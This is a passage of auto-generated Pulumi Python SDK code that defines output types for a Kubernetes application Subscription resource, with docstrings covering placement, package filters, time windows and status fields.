return pulumi.get(self, "channel")
@property
@pulumi.getter
def hooksecretref(self) -> Optional['outputs.SubscriptionSpecHooksecretref']:
"""
ObjectReference contains enough information to let you inspect or modify the referred object. --- New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs. 1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage. 2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted". Those cannot be well described when embedded. 3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen. 4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple and the version of the actual struct is irrelevant. 5. We cannot easily change it. Because this type is embedded in many locations, updates to this type will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control. Instead of using this type, create a locally provided and used type that is well-focused on your reference. For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
"""
return pulumi.get(self, "hooksecretref")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
To specify 1 package in channel
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def overrides(self) -> Optional[Sequence['outputs.SubscriptionSpecOverrides']]:
"""
for hub use only to specify the overrides when apply to clusters
"""
return pulumi.get(self, "overrides")
@property
@pulumi.getter(name="packageFilter")
def package_filter(self) -> Optional['outputs.SubscriptionSpecPackageFilter']:
"""
To specify more than 1 package in channel
"""
return pulumi.get(self, "package_filter")
@property
@pulumi.getter(name="packageOverrides")
def package_overrides(self) -> Optional[Sequence['outputs.SubscriptionSpecPackageOverrides']]:
"""
To provide flexibility to override package in channel with local input
"""
return pulumi.get(self, "package_overrides")
@property
@pulumi.getter
def placement(self) -> Optional['outputs.SubscriptionSpecPlacement']:
"""
For hub use only, to specify which clusters to go to
"""
return pulumi.get(self, "placement")
@property
@pulumi.getter
def timewindow(self) -> Optional['outputs.SubscriptionSpecTimewindow']:
"""
help user control when the subscription will take affect
"""
return pulumi.get(self, "timewindow")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecHooksecretref(dict):
"""
ObjectReference contains enough information to let you inspect or modify the referred object. --- New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs. 1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage. 2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted". Those cannot be well described when embedded. 3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen. 4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple and the version of the actual struct is irrelevant. 5. We cannot easily change it. Because this type is embedded in many locations, updates to this type will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control. Instead of using this type, create a locally provided and used type that is well-focused on your reference. For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
"""
def __init__(__self__, *,
api_version: Optional[str] = None,
field_path: Optional[str] = None,
kind: Optional[str] = None,
name: Optional[str] = None,
namespace: Optional[str] = None,
resource_version: Optional[str] = None,
uid: Optional[str] = None):
"""
ObjectReference contains enough information to let you inspect or modify the referred object. --- New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs. 1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage. 2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted". Those cannot be well described when embedded. 3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen. 4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple and the version of the actual struct is irrelevant. 5. We cannot easily change it. Because this type is embedded in many locations, updates to this type will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control. Instead of using this type, create a locally provided and used type that is well-focused on your reference. For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
:param str api_version: API version of the referent.
:param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
:param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
:param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
:param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
if api_version is not None:
pulumi.set(__self__, "api_version", api_version)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[str]:
"""
API version of the referent.
"""
return pulumi.get(self, "api_version")
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[str]:
"""
If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
"""
return pulumi.get(self, "field_path")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[str]:
"""
Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@property
@pulumi.getter
def uid(self) -> Optional[str]:
"""
UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
return pulumi.get(self, "uid")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecOverrides(dict):
"""
Overrides field in deployable
"""
def __init__(__self__, *,
cluster_name: str,
cluster_overrides: Sequence[Mapping[str, Any]]):
"""
Overrides field in deployable
"""
pulumi.set(__self__, "cluster_name", cluster_name)
pulumi.set(__self__, "cluster_overrides", cluster_overrides)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> str:
return pulumi.get(self, "cluster_name")
@property
@pulumi.getter(name="clusterOverrides")
def cluster_overrides(self) -> Sequence[Mapping[str, Any]]:
return pulumi.get(self, "cluster_overrides")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPackageFilter(dict):
"""
To specify more than 1 package in channel
"""
def __init__(__self__, *,
annotations: Optional[Mapping[str, str]] = None,
filter_ref: Optional['outputs.SubscriptionSpecPackageFilterFilterRef'] = None,
label_selector: Optional['outputs.SubscriptionSpecPackageFilterLabelSelector'] = None,
version: Optional[str] = None):
"""
To specify more than 1 package in channel
:param 'SubscriptionSpecPackageFilterFilterRefArgs' filter_ref: LocalObjectReference contains enough information to let you locate the referenced object inside the same namespace.
:param 'SubscriptionSpecPackageFilterLabelSelectorArgs' label_selector: A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if filter_ref is not None:
pulumi.set(__self__, "filter_ref", filter_ref)
if label_selector is not None:
pulumi.set(__self__, "label_selector", label_selector)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def annotations(self) -> Optional[Mapping[str, str]]:
return pulumi.get(self, "annotations")
@property
@pulumi.getter(name="filterRef")
def filter_ref(self) -> Optional['outputs.SubscriptionSpecPackageFilterFilterRef']:
"""
LocalObjectReference contains enough information to let you locate the referenced object inside the same namespace.
"""
return pulumi.get(self, "filter_ref")
@property
@pulumi.getter(name="labelSelector")
def label_selector(self) -> Optional['outputs.SubscriptionSpecPackageFilterLabelSelector']:
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
return pulumi.get(self, "label_selector")
@property
@pulumi.getter
def version(self) -> Optional[str]:
return pulumi.get(self, "version")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPackageFilterFilterRef(dict):
"""
LocalObjectReference contains enough information to let you locate the referenced object inside the same namespace.
"""
def __init__(__self__, *,
name: Optional[str] = None):
"""
LocalObjectReference contains enough information to let you locate the referenced object inside the same namespace.
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?
"""
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?
"""
return pulumi.get(self, "name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPackageFilterLabelSelector(dict):
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
def __init__(__self__, *,
match_expressions: Optional[Sequence['outputs.SubscriptionSpecPackageFilterLabelSelectorMatchExpressions']] = None,
match_labels: Optional[Mapping[str, str]] = None):
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
:param Sequence['SubscriptionSpecPackageFilterLabelSelectorMatchExpressionsArgs'] match_expressions: matchExpressions is a list of label selector requirements. The requirements are ANDed.
:param Mapping[str, str] match_labels: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
if match_expressions is not None:
pulumi.set(__self__, "match_expressions", match_expressions)
if match_labels is not None:
pulumi.set(__self__, "match_labels", match_labels)
@property
@pulumi.getter(name="matchExpressions")
def match_expressions(self) -> Optional[Sequence['outputs.SubscriptionSpecPackageFilterLabelSelectorMatchExpressions']]:
"""
matchExpressions is a list of label selector requirements. The requirements are ANDed.
"""
return pulumi.get(self, "match_expressions")
@property
@pulumi.getter(name="matchLabels")
def match_labels(self) -> Optional[Mapping[str, str]]:
"""
matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
return pulumi.get(self, "match_labels")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPackageFilterLabelSelectorMatchExpressions(dict):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
"""
def __init__(__self__, *,
key: str,
operator: str,
values: Optional[Sequence[str]] = None):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
:param str key: key is the label key that the selector applies to.
:param str operator: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
:param Sequence[str] values: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "operator", operator)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def key(self) -> str:
"""
key is the label key that the selector applies to.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter
def operator(self) -> str:
"""
operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
"""
return pulumi.get(self, "operator")
@property
@pulumi.getter
def values(self) -> Optional[Sequence[str]]:
"""
values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
return pulumi.get(self, "values")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPackageOverrides(dict):
"""
Overrides field in deployable
"""
def __init__(__self__, *,
package_name: str,
package_alias: Optional[str] = None,
package_overrides: Optional[Sequence[Mapping[str, Any]]] = None):
"""
Overrides field in deployable
"""
pulumi.set(__self__, "package_name", package_name)
if package_alias is not None:
pulumi.set(__self__, "package_alias", package_alias)
if package_overrides is not None:
pulumi.set(__self__, "package_overrides", package_overrides)
@property
@pulumi.getter(name="packageName")
def package_name(self) -> str:
return pulumi.get(self, "package_name")
@property
@pulumi.getter(name="packageAlias")
def package_alias(self) -> Optional[str]:
return pulumi.get(self, "package_alias")
@property
@pulumi.getter(name="packageOverrides")
def package_overrides(self) -> Optional[Sequence[Mapping[str, Any]]]:
return pulumi.get(self, "package_overrides")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPlacement(dict):
"""
For hub use only, to specify which clusters to go to
"""
def __init__(__self__, *,
cluster_selector: Optional['outputs.SubscriptionSpecPlacementClusterSelector'] = None,
clusters: Optional[Sequence['outputs.SubscriptionSpecPlacementClusters']] = None,
local: Optional[bool] = None,
placement_ref: Optional['outputs.SubscriptionSpecPlacementPlacementRef'] = None):
"""
For hub use only, to specify which clusters to go to
:param 'SubscriptionSpecPlacementClusterSelectorArgs' cluster_selector: A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
:param 'SubscriptionSpecPlacementPlacementRefArgs' placement_ref: ObjectReference contains enough information to let you inspect or modify the referred object.
"""
if cluster_selector is not None:
pulumi.set(__self__, "cluster_selector", cluster_selector)
if clusters is not None:
pulumi.set(__self__, "clusters", clusters)
if local is not None:
pulumi.set(__self__, "local", local)
if placement_ref is not None:
pulumi.set(__self__, "placement_ref", placement_ref)
@property
@pulumi.getter(name="clusterSelector")
def cluster_selector(self) -> Optional['outputs.SubscriptionSpecPlacementClusterSelector']:
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
return pulumi.get(self, "cluster_selector")
@property
@pulumi.getter
def clusters(self) -> Optional[Sequence['outputs.SubscriptionSpecPlacementClusters']]:
return pulumi.get(self, "clusters")
@property
@pulumi.getter
def local(self) -> Optional[bool]:
return pulumi.get(self, "local")
@property
@pulumi.getter(name="placementRef")
def placement_ref(self) -> Optional['outputs.SubscriptionSpecPlacementPlacementRef']:
"""
ObjectReference contains enough information to let you inspect or modify the referred object.
"""
return pulumi.get(self, "placement_ref")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPlacementClusterSelector(dict):
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
def __init__(__self__, *,
match_expressions: Optional[Sequence['outputs.SubscriptionSpecPlacementClusterSelectorMatchExpressions']] = None,
match_labels: Optional[Mapping[str, str]] = None):
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
:param Sequence['SubscriptionSpecPlacementClusterSelectorMatchExpressionsArgs'] match_expressions: matchExpressions is a list of label selector requirements. The requirements are ANDed.
:param Mapping[str, str] match_labels: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
if match_expressions is not None:
pulumi.set(__self__, "match_expressions", match_expressions)
if match_labels is not None:
pulumi.set(__self__, "match_labels", match_labels)
@property
@pulumi.getter(name="matchExpressions")
def match_expressions(self) -> Optional[Sequence['outputs.SubscriptionSpecPlacementClusterSelectorMatchExpressions']]:
"""
matchExpressions is a list of label selector requirements. The requirements are ANDed.
"""
return pulumi.get(self, "match_expressions")
@property
@pulumi.getter(name="matchLabels")
def match_labels(self) -> Optional[Mapping[str, str]]:
"""
matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
return pulumi.get(self, "match_labels")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPlacementClusterSelectorMatchExpressions(dict):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
"""
def __init__(__self__, *,
key: str,
operator: str,
values: Optional[Sequence[str]] = None):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
:param str key: key is the label key that the selector applies to.
:param str operator: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
:param Sequence[str] values: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "operator", operator)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def key(self) -> str:
"""
key is the label key that the selector applies to.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter
def operator(self) -> str:
"""
operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
"""
return pulumi.get(self, "operator")
@property
@pulumi.getter
def values(self) -> Optional[Sequence[str]]:
"""
values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
return pulumi.get(self, "values")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPlacementClusters(dict):
"""
GenericClusterReference - in alignment with kubefed
"""
def __init__(__self__, *,
name: str):
"""
GenericClusterReference - in alignment with kubefed
"""
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPlacementPlacementRef(dict):
"""
ObjectReference contains enough information to let you inspect or modify the referred object.
"""
def __init__(__self__, *,
api_version: Optional[str] = None,
field_path: Optional[str] = None,
kind: Optional[str] = None,
name: Optional[str] = None,
namespace: Optional[str] = None,
resource_version: Optional[str] = None,
uid: Optional[str] = None):
"""
ObjectReference contains enough information to let you inspect or modify the referred object.
:param str api_version: API version of the referent.
:param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
:param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
:param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
:param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
if api_version is not None:
pulumi.set(__self__, "api_version", api_version)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[str]:
"""
API version of the referent.
"""
return pulumi.get(self, "api_version")
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[str]:
"""
If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
"""
return pulumi.get(self, "field_path")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[str]:
"""
Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@property
@pulumi.getter
def uid(self) -> Optional[str]:
"""
UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
return pulumi.get(self, "uid")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecTimewindow(dict):
"""
help user control when the subscription will take affect
"""
def __init__(__self__, *,
daysofweek: Optional[Sequence[str]] = None,
hours: Optional[Sequence['outputs.SubscriptionSpecTimewindowHours']] = None,
location: Optional[str] = None,
windowtype: Optional[str] = None):
"""
help user control when the subscription will take affect
:param Sequence[str] daysofweek: weekdays defined the day of the week for this time window https://golang.org/pkg/time/#Weekday
:param str location: https://en.wikipedia.org/wiki/List_of_tz_database_time_zones
:param str windowtype: active time window or not, if timewindow is active, then deploy will only applies during these windows Note, if you want to generation crd with operator-sdk v0.10.0, then the following line should be: <+kubebuilder:validation:Enum=active,blocked,Active,Blocked>
"""
if daysofweek is not None:
pulumi.set(__self__, "daysofweek", daysofweek)
if hours is not None:
pulumi.set(__self__, "hours", hours)
if location is not None:
pulumi.set(__self__, "location", location)
if windowtype is not None:
pulumi.set(__self__, "windowtype", windowtype)
@property
@pulumi.getter
def daysofweek(self) -> Optional[Sequence[str]]:
"""
weekdays defined the day of the week for this time window https://golang.org/pkg/time/#Weekday
"""
return pulumi.get(self, "daysofweek")
@property
@pulumi.getter
def hours(self) -> Optional[Sequence['outputs.SubscriptionSpecTimewindowHours']]:
return pulumi.get(self, "hours")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
https://en.wikipedia.org/wiki/List_of_tz_database_time_zones
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def windowtype(self) -> Optional[str]:
"""
active time window or not, if timewindow is active, then deploy will only applies during these windows Note, if you want to generation crd with operator-sdk v0.10.0, then the following line should be: <+kubebuilder:validation:Enum=active,blocked,Active,Blocked>
"""
return pulumi.get(self, "windowtype")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecTimewindowHours(dict):
"""
HourRange time format for each time will be Kitchen format, defined at https://golang.org/pkg/time/#pkg-constants
"""
def __init__(__self__, *,
end: Optional[str] = None,
start: Optional[str] = None):
"""
HourRange time format for each time will be Kitchen format, defined at https://golang.org/pkg/time/#pkg-constants
"""
if end is not None:
pulumi.set(__self__, "end", end)
if start is not None:
pulumi.set(__self__, "start", start)
@property
@pulumi.getter
def end(self) -> Optional[str]:
return pulumi.get(self, "end")
@property
@pulumi.getter
def start(self) -> Optional[str]:
return pulumi.get(self, "start")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionStatus(dict):
"""
SubscriptionStatus defines the observed state of Subscription Examples - status of a subscription on hub Status: phase: Propagated statuses: washdc: packages: nginx: phase: Subscribed mongodb: phase: Failed Reason: "not authorized" Message: "user xxx does not have permission to start pod" resourceStatus: {} toronto: packages: nginx: phase: Subscribed mongodb: phase: Subscribed Status of a subscription on managed cluster will only have 1 cluster in the map.
"""
def __init__(__self__, *,
ansiblejobs: Optional['outputs.SubscriptionStatusAnsiblejobs'] = None,
last_update_time: Optional[str] = None,
message: Optional[str] = None,
phase: Optional[str] = None,
reason: Optional[str] = None,
statuses: Optional[Mapping[str, 'outputs.SubscriptionStatusStatuses']] = None):
"""
SubscriptionStatus defines the observed state of Subscription Examples - status of a subscription on hub Status: phase: Propagated statuses: washdc: packages: nginx: phase: Subscribed mongodb: phase: Failed Reason: "not authorized" Message: "user xxx does not have permission to start pod" resourceStatus: {} toronto: packages: nginx: phase: Subscribed mongodb: phase: Subscribed Status of a subscription on managed cluster will only have 1 cluster in the map.
:param str phase: INSERT ADDITIONAL STATUS FIELD - define observed state of cluster Important: Run "make" to regenerate code after modifying this file
:param Mapping[str, 'SubscriptionStatusStatusesArgs'] statuses: For endpoint, it is the status of subscription, key is packagename, For hub, it aggregates all status, key is cluster name
"""
if ansiblejobs is not None:
pulumi.set(__self__, "ansiblejobs", ansiblejobs)
if last_update_time is not None:
pulumi.set(__self__, "last_update_time", last_update_time)
if message is not None:
pulumi.set(__self__, "message", message)
if phase is not None:
pulumi.set(__self__, "phase", phase)
if reason is not None:
pulumi.set(__self__, "reason", reason)
if statuses is not None:
pulumi.set(__self__, "statuses", statuses)
@property
@pulumi.getter
def ansiblejobs(self) -> Optional['outputs.SubscriptionStatusAnsiblejobs']:
return pulumi.get(self, "ansiblejobs")
@property
@pulumi.getter(name="lastUpdateTime")
def last_update_time(self) -> Optional[str]:
return pulumi.get(self, "last_update_time")
@property
@pulumi.getter
def message(self) -> Optional[str]:
return pulumi.get(self, "message")
@property
@pulumi.getter
def phase(self) -> Optional[str]:
"""
INSERT ADDITIONAL STATUS FIELD - define observed state of cluster Important: Run "make" to regenerate code after modifying this file
"""
return pulumi.get(self, "phase")
@property
@pulumi.getter
def reason(self) -> Optional[str]:
return pulumi.get(self, "reason")
@property
@pulumi.getter
def statuses(self) -> Optional[Mapping[str, 'outputs.SubscriptionStatusStatuses']]:
"""
For endpoint, it is the status of subscription, key is packagename, For hub, it aggregates all status, key is cluster name
"""
return pulumi.get(self, "statuses")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionStatusAnsiblejobs(dict):
def __init__(__self__, *,
lastposthookjob: Optional[str] = None,
lastprehookjob: Optional[str] = None,
posthookjobshistory: Optional[Sequence[str]] = None,
prehookjobshistory: Optional[Sequence[str]] = None):
if lastposthookjob is not None:
pulumi.set(__self__, "lastposthookjob", lastposthookjob)
if lastprehookjob is not None:
pulumi.set(__self__, "lastprehookjob", lastprehookjob)
if posthookjobshistory is not None:
pulumi.set(__self__, "posthookjobshistory", posthookjobshistory)
if prehookjobshistory is not None:
pulumi.set(__self__, "prehookjobshistory", prehookjobshistory)
@property
@pulumi.getter
def lastposthookjob(self) -> Optional[str]:
return pulumi.get(self, "lastposthookjob")
@property
@pulumi.getter
def lastprehookjob(self) -> Optional[str]:
return pulumi.get(self, "lastprehookjob")
@property
@pulumi.getter
def posthookjobshistory(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "posthookjobshistory")
@property
@pulumi.getter
def prehookjobshistory(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "prehookjobshistory")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
